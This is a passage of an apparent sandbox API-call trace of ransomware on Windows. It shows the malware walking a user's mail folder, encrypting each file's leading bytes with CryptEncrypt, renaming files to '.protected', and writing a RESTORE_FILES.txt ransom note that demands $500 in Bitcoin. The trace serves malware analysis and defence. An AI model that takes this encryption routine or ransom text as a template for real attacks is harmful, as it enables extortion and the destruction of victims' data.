Mail\\Stationery\\Soft Blue.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm.protected")) returned 1 [0085.827] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.827] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Windows") returned -1 [0085.827] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Program Files") returned 1 [0085.827] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="Program Files (x86)") returned 1 [0085.827] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="$Recycle.bin") returned 1 [0085.827] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="System Volume Information") returned -1 [0085.827] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 94 [0085.827] StrStrIW (lpFirst="SoftBlue.jpg", lpSrch=".protected") returned 0x0 [0085.827] lstrcmpW (lpString1="SoftBlue.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0085.827] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.827] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 94 [0085.830] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".txt") returned 0x0 [0085.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 94 [0085.830] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".rar") returned 0x0 [0085.830] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg") returned 94 [0085.830] StrStrW (lpFirst="SoftBlue.jpg", lpSrch=".zip") returned 0x0 [0085.830] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0085.878] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.878] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0085.879] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.879] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.879] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.879] CloseHandle (hObject=0x150) returned 1 [0085.880] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.protected") returned 104 [0085.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg.protected")) returned 1 [0085.881] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.881] lstrcmpiW (lpString1="Stars.htm", lpString2="Windows") returned -1 [0085.881] lstrcmpiW (lpString1="Stars.htm", lpString2="Program Files") returned 1 [0085.881] lstrcmpiW (lpString1="Stars.htm", lpString2="Program Files (x86)") returned 1 [0085.881] lstrcmpiW (lpString1="Stars.htm", lpString2="$Recycle.bin") returned 1 [0085.881] lstrcmpiW (lpString1="Stars.htm", lpString2="System Volume Information") returned -1 [0085.881] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 91 [0085.881] StrStrIW (lpFirst="Stars.htm", lpSrch=".protected") returned 0x0 [0085.881] lstrcmpW (lpString1="Stars.htm", lpString2="RESTORE_FILES.txt") returned 1 [0085.881] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.881] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 91 [0085.883] StrStrW (lpFirst="Stars.htm", lpSrch=".txt") returned 0x0 [0085.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 91 [0085.883] StrStrW (lpFirst="Stars.htm", lpSrch=".rar") returned 0x0 [0085.883] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 91 [0085.883] StrStrW (lpFirst="Stars.htm", lpSrch=".zip") returned 0x0 [0085.883] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xe6, lpOverlapped=0x0) returned 1 [0085.884] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.886] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xe6, lpOverlapped=0x0) returned 1 [0085.887] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.887] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.887] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.887] CloseHandle (hObject=0x150) returned 1 [0085.887] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.protected") returned 101 [0085.888] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm.protected")) returned 1 [0085.888] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.888] lstrcmpiW (lpString1="Stars.jpg", lpString2="Windows") returned -1 [0085.888] lstrcmpiW (lpString1="Stars.jpg", lpString2="Program Files") returned 1 [0085.889] lstrcmpiW (lpString1="Stars.jpg", lpString2="Program Files (x86)") returned 1 [0085.889] lstrcmpiW (lpString1="Stars.jpg", lpString2="$Recycle.bin") returned 1 [0085.889] lstrcmpiW (lpString1="Stars.jpg", lpString2="System Volume Information") returned -1 [0085.889] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 91 [0085.889] StrStrIW (lpFirst="Stars.jpg", lpSrch=".protected") returned 0x0 [0085.889] lstrcmpW (lpString1="Stars.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0085.889] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.889] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.889] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 91 [0085.889] StrStrW (lpFirst="Stars.jpg", lpSrch=".txt") returned 0x0 [0085.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 91 [0085.889] StrStrW (lpFirst="Stars.jpg", lpSrch=".rar") returned 0x0 [0085.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg") returned 91 [0085.890] StrStrW (lpFirst="Stars.jpg", lpSrch=".zip") returned 0x0 [0085.890] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x1d51, lpOverlapped=0x0) returned 1 [0085.909] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe2af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.909] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1d51, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x1d51, lpOverlapped=0x0) returned 1 [0085.909] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.909] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.910] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.910] CloseHandle (hObject=0x150) returned 1 [0085.910] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.protected") returned 101 [0085.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.jpg.protected")) returned 1 [0085.911] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.911] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.911] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\RESTORE_FILES.txt") returned 99 [0085.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.912] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.912] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.912] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.912] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.912] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.912] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.912] CloseHandle (hObject=0x14c) returned 1 [0085.913] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.913] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Windows") returned 1 [0085.913] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files") returned 1 [0085.913] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="Program Files (x86)") returned 1 [0085.913] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="$Recycle.bin") returned 1 [0085.913] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="System Volume Information") returned 1 [0085.913] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 97 [0085.913] StrStrIW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".protected") returned 0x0 [0085.913] lstrcmpW (lpString1="WindowsMail.MSMessageStore", lpString2="RESTORE_FILES.txt") returned 1 [0085.913] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.913] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 97 [0085.914] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".txt") returned 0x0 [0085.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 97 [0085.914] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".rar") returned 0x0 [0085.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 97 [0085.914] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".zip") returned 0x0 [0085.914] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.929] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.929] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.930] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.930] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.932] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.932] CloseHandle (hObject=0x14c) returned 1 [0085.932] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.protected") returned 107 [0085.932] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore.protected")) returned 1 [0085.933] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.933] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Windows") returned 1 [0085.933] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files") returned 1 [0085.933] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files (x86)") returned 1 [0085.933] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="$Recycle.bin") returned 1 [0085.933] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="System Volume Information") returned 1 [0085.933] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 86 [0085.933] StrStrIW (lpFirst="WindowsMail.pat", lpSrch=".protected") returned 0x0 [0085.933] lstrcmpW (lpString1="WindowsMail.pat", lpString2="RESTORE_FILES.txt") returned 1 [0085.933] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.933] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.934] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 86 [0085.934] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".txt") returned 0x0 [0085.934] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 86 [0085.934] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".rar") returned 0x0 [0085.934] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat") returned 86 [0085.934] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".zip") returned 0x0 [0085.934] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x0, lpOverlapped=0x0) returned 1 [0085.935] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.935] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x0, lpOverlapped=0x0) returned 1 